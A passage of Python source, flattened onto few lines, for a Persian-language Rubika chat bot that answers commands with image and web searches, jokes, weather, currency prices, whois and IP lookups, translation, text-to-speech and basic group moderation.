'&chips=&page=1').text) jd = jd['results'] a = 0 for j in jd: if a <= 8: try: res = requests.get(j['image_link']) if res.status_code == 200 and res.content != b'' and j['cdn_thumbnail'] != '': thumb = str(j['cdn_thumbnail']) thumb = thumb.split('data:image/')[1] thumb = thumb.split(';')[0] if thumb == 'png': b2 = res.content width, height = bot.getImageSize(b2) tx = bot.requestFile(j['title'] + '.png', len(b2), 'png') access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url']) bot.sendImage(chat['last_message']['author_object_guid'] ,tx['id'] , 'png', tx['dc_id'] , access, j['title'] + '.png', len(b2), str(bot.getThumbInline(b2))[2:-1] , width, height, j['title']) print('sended file') elif thumb == 'webp': b2 = res.content width, height = bot.getImageSize(b2) tx = bot.requestFile(j['title'] + '.webp', len(b2), 'webp') access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url']) bot.sendImage(chat['last_message']['author_object_guid'] ,tx['id'] , 'webp', tx['dc_id'] , access, j['title'] + '.webp', len(b2), str(bot.getThumbInline(b2))[2:-1] , width, height, j['title']) print('sended file') else: b2 = res.content width, height = bot.getImageSize(b2) tx = bot.requestFile(j['title'] + '.jpg', len(b2), 'jpg') access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url']) bot.sendImage(chat['last_message']['author_object_guid'] ,tx['id'] , 'jpg', tx['dc_id'] , access, j['title'] + '.jpg', len(b2), str(bot.getThumbInline(b2))[2:-1] , width, height, j['title']) print('sended file') a += 1 except: print('image error') else: break elif chat['abs_object']['type'] == 'User': bot.sendMessage(chat['object_guid'], 'در حال یافتن کمی صبور باشید...', chat['last_message']['message_id']) print('search image') jd = json.loads(requests.get('https://zarebin.ir/api/image/?q=' + search + '&chips=&page=1').text) jd = jd['results'] a = 0 for j in jd: if a < 10: try: res = requests.get(j['image_link']) if res.status_code == 200 and res.content != b'' and j['cdn_thumbnail'] != '' and j['cdn_thumbnail'].startswith('data:image'): thumb = str(j['cdn_thumbnail']) thumb = thumb.split('data:image/')[1] thumb = thumb.split(';')[0] if thumb == 'png': b2 = res.content width, height = bot.getImageSize(b2) tx = bot.requestFile(j['title'] + '.png', len(b2), 'png') access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url']) bot.sendImage(chat['object_guid'] ,tx['id'] , 'png', tx['dc_id'] , access, j['title'] + '.png', len(b2), str(bot.getThumbInline(b2))[2:-1] , width, height, j['title'], chat['last_message']['message_id']) print('sended file') elif thumb == 'webp': b2 = res.content width, height = bot.getImageSize(b2) tx = bot.requestFile(j['title'] + '.webp', len(b2), 'webp') access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url']) bot.sendImage(chat['object_guid'] ,tx['id'] , 'webp', tx['dc_id'] , access, j['title'] + '.webp', len(b2), str(bot.getThumbInline(b2))[2:-1] , width, height, j['title'], chat['last_message']['message_id']) print('sended file') else: b2 = res.content tx = bot.requestFile(j['title'] + '.jpg', len(b2), 'jpg') access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url']) width, height = bot.getImageSize(b2) bot.sendImage(chat['object_guid'] ,tx['id'] , 'jpg', tx['dc_id'] , access, j['title'] + '.jpg', len(b2), str(bot.getThumbInline(b2))[2:-1] , width, height, j['title'], chat['last_message']['message_id']) print('sended file') a += 1 except: print('image erorr') return True except: print('image search err') return False def write_image(text,chat,bot): try: c_id = chat['last_message']['message_id'] msg_data = bot.getMessagesInfo(chat['object_guid'], [c_id]) msg_data = msg_data[0] if 'reply_to_message_id' in msg_data.keys(): msg_data = bot.getMessagesInfo(chat['object_guid'], [msg_data['reply_to_message_id']])[0] if 'text' in msg_data.keys() and msg_data['text'].strip() != '': txt_xt = msg_data['text'] paramiters = text[8:-1] paramiters = paramiters.split(':') if len(paramiters) == 5: b2 = bot.write_text_image(txt_xt,paramiters[0],int(paramiters[1]),str(paramiters[2]),int(paramiters[3]),int(paramiters[4])) tx = bot.requestFile('code_image.png', len(b2), 'png') access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url']) width, height = bot.getImageSize(b2) bot.sendImage(chat['object_guid'] ,tx['id'] , 'png', tx['dc_id'] , access, 'code_image.png', len(b2) , str(bot.getThumbInline(b2))[2:-1] , width, height ,message_id= c_id) print('sended file') return True return False except: print('server ban bug') return False def uesr_remove(text,chat,bot): try: admins = [i["member_guid"] for i in bot.getGroupAdmins(chat['object_guid'])["data"]["in_chat_members"]] if chat['last_message']['author_object_guid'] in admins: c_id = chat['last_message']['message_id'] msg_data = bot.getMessagesInfo(chat['object_guid'], [c_id]) msg_data = msg_data[0] if 'reply_to_message_id' in msg_data.keys(): msg_data = bot.getMessagesInfo(chat['object_guid'], [msg_data['reply_to_message_id']])[0] if not msg_data['author_object_guid'] in admins: bot.banGroupMember(chat['object_guid'], msg_data['author_object_guid']) bot.sendMessage(chat['object_guid'], 'انجام شد' , chat['last_message']['message_id']) return True return False except: print('server ban bug') return False def speak_after(text,chat,bot): try: c_id = chat['last_message']['message_id'] msg_data = bot.getMessagesInfo(chat['object_guid'], [c_id]) msg_data = msg_data[0] if 'reply_to_message_id' in msg_data.keys(): msg_data = bot.getMessagesInfo(chat['object_guid'], [msg_data['reply_to_message_id']])[0] if 'text' in msg_data.keys() and msg_data['text'].strip() != '': txt_xt = msg_data['text'] speech = gTTS(txt_xt) changed_voice = io.BytesIO() speech.write_to_fp(changed_voice) b2 = changed_voice.getvalue() tx = bot.requestFile('sound.ogg', len(b2), 'sound.ogg') access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url']) f = io.BytesIO() f.write(b2) f.seek(0) audio = MP3(f) dur = audio.info.length bot.sendVoice(chat['object_guid'],tx['id'] , 'ogg', tx['dc_id'] , access, 'sound.ogg', len(b2), dur * 1000 ,message_id= c_id) print('sended voice') return True return False except: print('server gtts bug') return False def joker(text,chat,bot): try: jd = requests.get('https://api.codebazan.ir/jok/').text bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id']) return True except: print('code bz server err') return False def info_qroz(text,chat,bot): try: user_info = bot.getInfoByUsername(text[7:]) if user_info['data']['exist'] == True: if user_info['data']['type'] == 'User': bot.sendMessage(chat['object_guid'], 'name:\n ' + user_info['data']['user']['first_name'] + ' ' + user_info['data']['user']['last_name'] + '\n\nbio:\n ' + user_info['data']['user']['bio'] + '\n\nguid:\n ' + user_info['data']['user']['user_guid'] , chat['last_message']['message_id']) print('sended response') else: bot.sendMessage(chat['object_guid'], 'کانال است' , chat['last_message']['message_id']) print('sended response') else: bot.sendMessage(chat['object_guid'], 'وجود ندارد' , chat['last_message']['message_id']) print('sended response') return True except: print('server bug6') return False def search(text,chat,bot): try: search = text[9:-1] if hasInsult(search)[0] == False and chat['abs_object']['type'] == 'Group': jd = json.loads(requests.get('https://zarebin.ir/api/?q=' + search + '&page=1&limit=10').text) results = jd['results']['webs'] text = '' for result in results: text += result['title'] + '\n\n' bot.sendMessage(chat['object_guid'], 'نتایج به پیوی شما ارسال شد', chat['last_message']['message_id']) bot.sendMessage(chat['last_message']['author_object_guid'], 'نتایج یافت شده برای (' + search + ') : \n\n'+text) elif chat['abs_object']['type'] == 'User': jd = json.loads(requests.get('https://zarebin.ir/api/?q=' + search + '&page=1&limit=10').text) results = jd['results']['webs'] text = '' for result in results: text += result['title'] + '\n\n' bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id']) return True except: print('search zarebin err') bot.sendMessage(chat['object_guid'], 'در حال حاضر این دستور محدود یا در حال تعمیر است' , chat['last_message']['message_id']) return False def p_danesh(text,chat,bot): try: res = requests.get('http://api.codebazan.ir/danestani/pic/') if res.status_code == 200 and res.content != b'': b2 = res.content width, height = bot.getImageSize(b2) tx = bot.requestFile('jok_'+ str(random.randint(1000000, 9999999)) + '.png', len(b2), 'png') access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url']) bot.sendImage(chat['object_guid'] ,tx['id'] , 'png', tx['dc_id'] , access, 'jok_'+ str(random.randint(1000000, 9999999)) + '.png', len(b2), str(bot.getThumbInline(b2))[2:-1] , width, height, message_id=chat['last_message']['message_id']) print('sended file') return True except: print('code bz danesh api bug') return False def anti_insult(text,chat,bot): try: admins = [i["member_guid"] for i in bot.getGroupAdmins(chat['object_guid'])["data"]["in_chat_members"]] if not chat['last_message']['author_object_guid'] in admins: print('yek ahmagh fohsh dad: ' + chat['last_message']['author_object_guid']) bot.deleteMessages(chat['object_guid'], [chat['last_message']['message_id']]) return True return False except: print('delete the fohsh err') def anti_tabligh(text,chat,bot): try: admins = [i["member_guid"] for i in bot.getGroupAdmins(chat['object_guid'])["data"]["in_chat_members"]] if not chat['last_message']['author_object_guid'] in admins: print('yek ahmagh tabligh kard: ' + chat['last_message']['author_object_guid']) bot.deleteMessages(chat['object_guid'], [chat['last_message']['message_id']]) return True return False except: print('tabligh delete err') def get_curruncy(text,chat,bot): try: t = json.loads(requests.get('https://api.codebazan.ir/arz/?type=arz').text) text = '' for i in t: price = i['price'].replace(',','')[:-1] + ' تومان' text += i['name'] + ' : ' + price + '\n' bot.sendMessage(chat['object_guid'], text, chat['last_message']['message_id']) except: print('code bz arz err') return True def shot_image(text,chat,bot): try: c_id = chat['last_message']['message_id'] msg_data = bot.getMessagesInfo(chat['object_guid'], [c_id]) msg_data = msg_data[0] if 'reply_to_message_id' in msg_data.keys(): msg_data = bot.getMessagesInfo(chat['object_guid'], [msg_data['reply_to_message_id']])[0] if 'text' in msg_data.keys() and msg_data['text'].strip() != '': txt_xt = msg_data['text'] res = requests.get('https://api.otherapi.tk/carbon?type=create&code=' + txt_xt + '&theme=vscode') if res.status_code == 200 and res.content != b'': b2 = res.content tx = bot.requestFile('code_image.png', len(b2), 'png') access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url']) width, height = bot.getImageSize(b2) bot.sendImage(chat['object_guid'] ,tx['id'] , 'png', tx['dc_id'] , access, 'code_image.png', len(b2) , str(bot.getThumbInline(b2))[2:-1] , width, height ,message_id= c_id) print('sended file') except: print('code bz shot err') return True def get_ip(text,chat,bot): try: ip = text[5:-1] if hasInsult(ip)[0] == False: jd = json.loads(requests.get('https://api.codebazan.ir/ipinfo/?ip=' + ip).text) text = 'نام شرکت:\n' + jd['company'] + '\n\nکشور : \n' + jd['country_name'] + '\n\nارائه دهنده : ' + jd['isp'] bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id']) except: print('code bz ip err') return True def get_weather(text,chat,bot): try: city = text[10:-1] if hasInsult(city)[0] == False: jd = json.loads(requests.get('https://api.codebazan.ir/weather/?city=' + city).text) text = 'دما : \n'+jd['result']['دما'] + '\n سرعت باد:\n' + jd['result']['سرعت باد'] + '\n وضعیت هوا: \n' + jd['result']['وضعیت هوا'] + '\n\n بروز رسانی اطلاعات امروز: ' + jd['result']['به روز رسانی'] + '\n\nپیش بینی هوا فردا: \n دما: ' + jd['فردا']['دما'] + '\n وضعیت هوا : ' + jd['فردا']['وضعیت هوا'] bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id']) except: print('code bz weather err') return True def get_whois(text,chat,bot): try: site = text[8:-1] jd = json.loads(requests.get('https://api.codebazan.ir/whois/index.php?type=json&domain=' + site).text) text = 'مالک : \n'+jd['owner'] + '\n\n آیپی:\n' + jd['ip'] + '\n\nآدرس مالک : \n' + jd['address'] + '\n\ndns1 : \n' + jd['dns']['1'] + '\ndns2 : \n' + jd['dns']['2'] bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id']) except: print('code bz whois err') return True def get_font(text,chat,bot): try: name_user = text[7:-1] jd = json.loads(requests.get('https://api.codebazan.ir/font/?text=' + name_user).text) jd = jd['result'] text = '' for i in range(1,100): text += jd[str(i)] + '\n' if hasInsult(name_user)[0] == False and chat['abs_object']['type'] == 'Group': bot.sendMessage(chat['object_guid'], 'نتایج کامل به پیوی شما ارسال شد', chat['last_message']['message_id']) bot.sendMessage(chat['last_message']['author_object_guid'], 'نتایج یافت شده برای (' + name_user + ') : \n\n'+text) elif chat['abs_object']['type'] == 'User': bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id']) except: print('code bz font err') return True def get_ping(text,chat,bot): try: site = text[7:-1] jd = requests.get('https://api.codebazan.ir/ping/?url=' + site).text text = str(jd) bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id']) except: print('code bz ping err') return True def get_gold(text,chat,bot): try: r = json.loads(requests.get('https://www.wirexteam.ga/gold').text) change = str(r['data']['last_update']) r = r['gold'] text = '' for o in r: text += o['name'] + ' : ' + o['nerkh_feli'] + '\n' text += '\n\nآخرین تغییر : ' + change bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id']) except: print('gold server err') return True def get_wiki(text,chat,bot): try: t = text[7:-1] t = t.split(':') mozoa = '' t2 = '' page = int(t[0]) for i in range(1,len(t)): t2 += t[i] mozoa = t2 if hasInsult(mozoa)[0] == False and chat['abs_object']['type'] == 'Group' and page > 0: text_t = requests.get('https://api.codebazan.ir/wiki/?search=' + mozoa).text if not 'codebazan.ir' in text_t: CLEANR = re.compile('<.*?>') def cleanhtml(raw_html): cleantext = re.sub(CLEANR, '', raw_html) return cleantext text_t = cleanhtml(text_t) n = 4200 text_t = text_t.strip() max_t = page * n min_t = max_t - n text = text_t[min_t:max_t] bot.sendMessage(chat['object_guid'], 'مقاله "'+ mozoa + '" صفحه : ' + str(page) + ' به پیوی شما ارسال شد', chat['last_message']['message_id']) bot.sendMessage(chat['last_message']['author_object_guid'], 'نتایج یافت شده برای (' + mozoa + ') : \n\n'+text) elif chat['abs_object']['type'] == 'User' and page > 0: text_t = requests.get('https://api.codebazan.ir/wiki/?search=' + mozoa).text if not 'codebazan.ir' in text_t: CLEANR = re.compile('<.*?>') def cleanhtml(raw_html): cleantext = re.sub(CLEANR, '', raw_html) return cleantext text_t = cleanhtml(text_t) n = 4200 text_t = text_t.strip() max_t = page * n min_t = max_t - n text = text_t[min_t:max_t] bot.sendMessage(chat['object_guid'], text, chat['last_message']['message_id']) except: print('code bz wiki err') return True def get_pa_na_pa(text,chat,bot): try: jd = requests.get('https://api.codebazan.ir/jok/pa-na-pa/').text bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id']) except: print('code bz pa na pa err') return True def get_dastan(text,chat,bot): try: jd = requests.get('https://api.codebazan.ir/dastan/').text bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id']) except: print('code bz dastan err') return True def get_search_k(text,chat,bot): try: search = text[11:-1] if hasInsult(search)[0] == False and chat['abs_object']['type'] == 'Group': jd = json.loads(requests.get('https://zarebin.ir/api/?q=' + search + '&page=1&limit=10').text) results = jd['results']['webs'] text = '' for result in results: text += result['title'] + ':\n\n ' + str(result['description']).replace('</em>', '').replace('<em>', '').replace('(Meta Search Engine)', '').replace('&quot;', '').replace(' — ', '').replace(' AP', '') + '\n\n' bot.sendMessage(chat['object_guid'], 'نتایج کامل به پیوی شما ارسال شد', chat['last_message']['message_id']) bot.sendMessage(chat['last_message']['author_object_guid'], 'نتایج یافت شده برای (' + search + ') : \n\n'+text) elif chat['abs_object']['type'] == 'User': jd = json.loads(requests.get('https://zarebin.ir/api/?q=' + search + '&page=1&limit=10').text) results = jd['results']['webs'] text = '' for result in results: text += result['title'] + ':\n\n ' + str(result['description']).replace('</em>', '').replace('<em>', '').replace('(Meta Search Engine)', '').replace('&quot;', '').replace(' — ', '').replace(' AP', '') + '\n\n' bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id']) except: print('zarebin search err') return True def get_bio(text,chat,bot): try: jd = requests.get('https://api.codebazan.ir/bio/').text bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id']) except: print('code bz bio err') return True def get_trans(text,chat,bot): try: t = text[8:-1] t = t.split(':') lang = t[0] t2 = '' for i in range(1,len(t)): t2 += t[i] text_trans = t2 if hasInsult(text_trans)[0] == False: t = Translator() text = t.translate(text_trans,lang).text bot.sendMessage(chat['object_guid'], text, chat['last_message']['message_id']) elif chat['abs_object']['type'] == 'User': t = Translator() text = t.translate(text_trans,lang).text bot.sendMessage(chat['object_guid'], text, chat['last_message']['message_id']) except: print('google trans err') return True def get_khatere(text,chat,bot): try: jd = requests.get('https://api.codebazan.ir/jok/khatere/').text bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id']) except: print('code bz khatere err') return True def get_danesh(text,chat,bot): try: jd = requests.get('https://api.codebazan.ir/danestani/').text bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id']) except: print('code bz danesh err') return True def get_alaki_masala(text,chat,bot): try: jd = requests.get('https://api.codebazan.ir/jok/alaki-masalan/').text bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id']) except: print('code bz alaki masala err') return True def name_shakh(text,chat,bot): try: jd = requests.get('https://api.codebazan.ir/name/').text bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id']) except: print('code bz name err') def get_vaj(text,chat,bot): try: vaj = text[6:-1] if hasInsult(vaj)[0] == False: jd = json.loads(requests.get('https://api.codebazan.ir/vajehyab/?text=' + vaj).text) jd = jd['result'] text = 'معنی : \n'+jd['mani'] + '\n\n لغتنامه معین:\n' + jd['Fmoein'] + '\n\nلغتنامه دهخدا : \n' + jd['Fdehkhoda'] + '\n\nمترادف و متضاد : ' + jd['motaradefmotezad'] bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id']) except: print('code bz vaj err') def get_font_fa(text,chat,bot): try: site = text[10:-1] jd = json.loads(requests.get('https://api.codebazan.ir/font/?type=fa&text=' + site).text) jd = jd['Result'] text = '' for i in range(1,10): text += jd[str(i)] + '\n' if hasInsult(site)[0] == False and chat['abs_object']['type'] == 'Group': bot.sendMessage(chat['object_guid'], 'نتایج کامل به پیوی شما ارسال شد', chat['last_message']['message_id']) bot.sendMessage(chat['last_message']['author_object_guid'], 'نتایج یافت شده برای (' + site + ') : \n\n'+text) elif chat['abs_object']['type'] == 'User': bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id']) except: print('code bz font fa err') def get_leaved(text,chat,bot): try: send_text = 'بای بای 🖖' bot.sendMessage(chat['object_guid'], send_text, chat['last_message']['message_id']) except: print('rub server err') def get_added(text,chat,bot): try: group = chat['abs_object']['title'] send_text = 'سلام دوست عزیز به ' + group + ' خوش آمدی ❤ \n لطفا قوانین رو رعایت کن ✅' bot.sendMessage(chat['object_guid'], send_text, chat['last_message']['message_id']) except: print('rub server err') def get_help(text,chat,bot): text = open('help.txt','r').read() if chat['abs_object']['type'] == 'Group': bot.sendMessage(chat['object_guid'], 'نتایج کامل به پیوی شما ارسال شد', chat['last_message']['message_id']) bot.sendMessage(chat['last_message']['author_object_guid'], text) elif chat['abs_object']['type'] == 'User': bot.sendMessage(chat['object_guid'], text, chat['last_message']['message_id']) print('help guid sended') def usvl_save_data(text,chat,bot): try: c_id = chat['last_message']['message_id'] msg_data = bot.getMessagesInfo(chat['object_guid'], [c_id]) msg_data = msg_data[0] if 'reply_to_message_id' in msg_data.keys(): msg_data = bot.getMessagesInfo(chat['object_guid'], [msg_data['reply_to_message_id']])[0] if 'text' in msg_data.keys() and msg_data['text'].strip() != '': txt_xt = msg_data['text'] f3 = len(open('farsi-dic.txt','rb').read()) if f3 < 83886080: f2 = open('farsi-dic.txt','r').read().split('|/|\n')[:-1] f2 = [i.split('|=|')[0] for i in f2] if not txt_xt in f2: f2 = open('farsi-dic.txt','a') f2.write(txt_xt + '|=|' + text + '|/|\n') f2.close() else: bot.sendMessage(chat['object_guid'], '!usvl_stop') b2 = open('farsi-dic.txt','rb').read() tx = bot.requestFile('farsi-dic.txt', len(b2), 'txt') access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url']) bot.sendFile(chat['object_guid'] ,tx['id'] , 'txt', tx['dc_id'] , access, 'farsi-dic.txt', len(b2), message_id=c_id) return True except: print('server rubika err') def usvl_test_data(text,chat,bot): try: f2 = open('farsi-dic.txt','r').read().split('|/|\n')[:-1] texts = [i.split('|=|')[0] for i in f2] replies = [i.split('|=|')[1] for i in f2] shebahat = 0.0 a = 0 shabih_tarin = None for text2 in texts: sh2 = similar(text, text2) if sh2 > shebahat: shebahat = sh2 shabih_tarin = a a += 1 print('shabih tarin: ' + str(shabih_tarin) , '|| darsad shebaht :' + str(shebahat)) if shabih_tarin != None: bot.sendMessage(chat['object_guid'], replies[shabih_tarin], chat['last_message']['message_id']) except: print('server rubika err') def get_backup(text,chat,bot): try: b2 = open('farsi-dic.txt','rb').read() tx = bot.requestFile('farsi-dic.txt', len(b2), 'txt') access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url']) bot.sendFile(chat['object_guid'] ,tx['id'] , 'txt', tx['dc_id'] , access, 'farsi-dic.txt', len(b2), message_id=chat['last_message']['message_id']) except: print('back err') g_usvl = '' test_usvl = False auth = "" bot = Bot(auth) list_message_seened = [] time_reset = random._floor(datetime.datetime.today().timestamp()) + 350 while(2 > 1): try: chats_list:list = bot.get_updates_all_chats() qrozAdmins = open('qrozAdmins.txt','r').read().split('\n') if chats_list != []: for chat in chats_list: access = chat['access'] if chat['abs_object']['type'] == 'User' or chat['abs_object']['type'] == 'Group': text:str = chat['last_message']['text'] print(chat) if 'SendMessages' in access and chat['last_message']['type'] == 'Text' and text.strip() != '': text = text.strip() m_id = chat['object_guid'] + chat['last_message']['message_id'] if not m_id in list_message_seened: print('new message') if text == '!start': print('message geted and sinned') try: bot.sendMessage(chat['object_guid'], 'سلام \n به ابر سرویس کروز خوش آمدید ❤\n\n لطفا جهت راهنما \n!help \nرا ارسال کنید',chat['last_message']['message_id']) print('sended response') except: print('server bug1') elif text.startswith('!nim http://') == True or text.startswith('!nim https://') == True: try: bot.sendMessage(chat['object_guid'], "در حال آماده سازی لینک ...",chat['last_message']['message_id']) print('sended response') link = text[4:] nim_baha_link=requests.post("https://www.digitalbam.ir/DirectLinkDownloader/Download",params={'downloadUri':link}) pg:str = nim_baha_link.text pg = pg.split('{"fileUrl":"') pg = pg[1] pg = pg.split('","message":""}') pg = pg[0] nim_baha = pg try: bot.sendMessage(chat['object_guid'], 'لینک نیم بها شما با موفقیت آماده شد ✅ \n لینک : \n' + nim_baha ,chat['last_message']['message_id']) print('sended response') except: print('server bug2') except: print('server bug3') elif text.startswith('!info @'): tawd10 = Thread(target=info_qroz, args=(text, chat, bot,)) tawd10.start() elif text.startswith('!search ['): tawd11 = Thread(target=search, args=(text, chat, bot,)) tawd11.start() elif text.startswith('!wiki-s ['): try: search = text[9:-1] search = search + ' ویکی پدیا' if hasInsult(search)[0] == False and chat['abs_object']['type'] == 'Group': jd = json.loads(requests.get('https://zarebin.ir/api/?q=' + search + '&page=1&limit=10').text) results = jd['results']['webs'][0:4] text = '' for result in results: if ' - ویکی‌پدیا، دانشنامهٔ آزاد' in result['title']: title = result['title'].replace(' - ویکی‌پدیا، دانشنامهٔ آزاد','') text += title + ' :\n\n' + str(result['description']).replace('</em>', '').replace('<em>', '').replace('(Meta Search Engine)', '').replace('&quot;', '').replace(' — ', '').replace(' AP', '') + '\n\nمقاله کامل صفحه 1 : \n' + '!wiki [1:' + title + ']\n\n' bot.sendMessage(chat['object_guid'], 'نتایج به پیوی شما ارسال شد', chat['last_message']['message_id']) bot.sendMessage(chat['last_message']['author_object_guid'], 'نتایج یافت شده برای (' + search + ') : \n\n'+text) elif chat['abs_object']['type'] == 'User': jd = json.loads(requests.get('https://zarebin.ir/api/?q=' + search + '&page=1&limit=10').text) results = jd['results']['webs'][0:4] text = '' for result in results: if ' - ویکی‌پدیا، دانشنامهٔ آزاد' in result['title']: title = result['title'].replace(' - ویکی‌پدیا، دانشنامهٔ آزاد','') text += title + ' :\n\n' + str(result['description']).replace('</em>', '').replace('<em>', '').replace('(Meta Search Engine)', '').replace('&quot;', '').replace(' — ', '').replace(' AP', '') + '\n\nمقاله کامل صفحه 1 : \n' + '!wiki [1:' + title + ']\n\n' bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id']) except: print('wiki s err') elif text.startswith('!jok'): tawd9 = Thread(target=joker, args=(text, chat, bot,)) tawd9.start() elif text.startswith('!name_shakh'): tawd32 = Thread(target=name_shakh, args=(text, chat, bot,)) tawd32.start() elif text.startswith('!khatere'): tawd29 = Thread(target=get_khatere, args=(text, chat, bot,)) tawd29.start() elif text.startswith('!danesh'): tawd30 = Thread(target=get_danesh, args=(text, chat, bot,)) tawd30.start() elif text.startswith('!pa_na_pa'): tawd24 = Thread(target=get_pa_na_pa, args=(text, chat, bot,)) tawd24.start() elif text.startswith('!alaki_masala'): tawd31 = Thread(target=get_alaki_masala, args=(text, chat, bot,)) tawd31.start() elif text.startswith('!dastan'): tawd25 = Thread(target=get_dastan, args=(text, chat, bot,)) tawd25.start() elif text.startswith('!bio'): tawd27 = Thread(target=get_bio, args=(text, chat, bot,)) tawd27.start() elif text.startswith('!search-k ['): tawd26 = Thread(target=get_search_k, args=(text, chat, bot,)) tawd26.start() elif text.startswith('!ban [') and chat['abs_object']['type'] == 'Group' and 'BanMember' in access: try: user = text[6:-1].replace('@', '') guid = bot.getInfoByUsername(user)["data"]["chat"]["abs_object"]["object_guid"] admins = [i["member_guid"] for i in bot.getGroupAdmins(chat['object_guid'])["data"]["in_chat_members"]] if not guid in admins and chat['last_message']['author_object_guid'] in admins: bot.banGroupMember(chat['object_guid'], guid) bot.sendMessage(chat['object_guid'], 'انجام شد' , chat['last_message']['message_id']) except: print('ban bug') elif text.startswith('!search-i ['): print('mpa started') tawd = Thread(target=search_i, args=(text, chat, bot,)) tawd.start() elif text.startswith('!remove') and chat['abs_object']['type'] == 'Group' and 'BanMember' in access: print('mpa started') tawd2 = Thread(target=uesr_remove, args=(text, chat, bot,)) tawd2.start() elif text.startswith('!trans ['): tawd28 = Thread(target=get_trans, args=(text, chat, bot,)) tawd28.start() elif text.startswith('!myket-s ['): try: search = text[10:-1] if hasInsult(search)[0] == False and chat['abs_object']['type'] == 'Group': bot.sendMessage(chat['object_guid'], 'نتایج کامل به زودی به پیوی شما ارسال میشوند', chat['last_message']['message_id']) jd = json.loads(requests.get('https://www.wirexteam.ga/myket?type=search&query=' + search).text) jd = jd['search'] a = 0 text = '' for j in jd: if a <= 7: text += '🔸 عنوان : ' + j['title_fa'] + '\nℹ️ توضیحات : '+ j['tagline'] + '\n🆔 نام یکتا برنامه : ' + j['package_name'] + '\n⭐️امتیاز: ' + str(j['rate']) + '\n✳ نام نسخه : ' + j['version'] + '\nقیمت : ' + j['price'] + '\nحجم : ' + j['size'] + '\nبرنامه نویس : ' + j['developer'] + '\n\n' a += 1 else: break if text != '': bot.sendMessage(chat['last_message']['author_object_guid'], 'نتایج یافت شده برای (' + search + ') : \n\n'+text) elif chat['abs_object']['type'] == 'User': jd = json.loads(requests.get('https://www.wirexteam.ga/myket?type=search&query=' + search).text) jd = jd['search'] a = 0 text = '' for j in jd: if a <= 7: text += '🔸 عنوان : ' + j['title_fa'] + '\nℹ️ توضیحات : '+ j['tagline'] + '\n🆔 نام یکتا برنامه : ' + j['package_name'] + '\n⭐️امتیاز: ' + str(j['rate']) + '\n✳ نام نسخه : ' + j['version'] + '\nقیمت : ' + j['price'] + '\nحجم : ' + j['size'] + '\nبرنامه نویس : ' + j['developer'] + '\n\n' a += 1 else: break if text != '': bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id']) except: print('myket server err') elif text.startswith('!wiki ['): tawd23 = Thread(target=get_wiki, args=(text, chat, bot,)) tawd23.start() elif text.startswith('!currency'): print('mpa started') tawd15 = Thread(target=get_curruncy, args=(text, chat, bot,)) tawd15.start() elif text.startswith('!gold'): tawd22 = Thread(target=get_gold, args=(text, chat, bot,)) tawd22.start() elif text.startswith('!ping ['): tawd21 = Thread(target=get_ping, args=(text, chat, bot,)) tawd21.start() elif text.startswith('!font ['): tawd20 = Thread(target=get_font, args=(text, chat, bot,)) tawd20.start() elif text.startswith('!font-fa ['): tawd34 = Thread(target=get_font_fa, args=(text, chat, bot,)) tawd34.start() elif text.startswith('!whois ['): tawd19 = Thread(target=get_whois, args=(text, chat, bot,)) tawd19.start() elif text.startswith('!vaj ['): tawd33 = Thread(target=get_vaj, args=(text, chat, bot,)) tawd33.start() elif text.startswith('!weather ['): tawd18 = Thread(target=get_weather, args=(text, chat, bot,)) tawd18.start() elif text.startswith('!ip ['): tawd17 = Thread(target=get_ip, args=(text, chat, bot,)) tawd17.start() elif text.startswith("!add [") and chat['abs_object']['type'] == 'Group' and 'AddMember' in access: try: user = text[6:-1] bot.invite(chat['object_guid'], [bot.getInfoByUsername(user.replace('@', ''))["data"]["chat"]["object_guid"]]) bot.sendMessage(chat['object_guid'], 'اضافه شد' , chat['last_message']['message_id']) except: print('add not successd') elif text.startswith('!math ['): try: amal_and_value = text[7:-1] natije = '' if amal_and_value.count('*') == 1: value1 = float(amal_and_value.split('*')[0].strip()) value2 = float(amal_and_value.split('*')[1].strip()) natije = value1 * value2 elif amal_and_value.count('/') > 0: value1 = float(amal_and_value.split('/')[0].strip()) value2 = float(amal_and_value.split('/')[1].strip()) natije = value1 / value2 elif amal_and_value.count('+') > 0: value1 = float(amal_and_value.split('+')[0].strip()) value2 = float(amal_and_value.split('+')[1].strip()) natije = value1 + value2 elif amal_and_value.count('-') > 0: value1 = float(amal_and_value.split('-')[0].strip()) value2 = float(amal_and_value.split('-')[1].strip()) natije = value1 - value2 elif amal_and_value.count('**') > 0: value1 = float(amal_and_value.split('**')[0].strip()) value2 = float(amal_and_value.split('**')[1].strip()) natije = value1 ** value2 if natije != '': bot.sendMessage(chat['object_guid'], natije , chat['last_message']['message_id']) except: print('math err') elif text.startswith('!shot'): tawd16 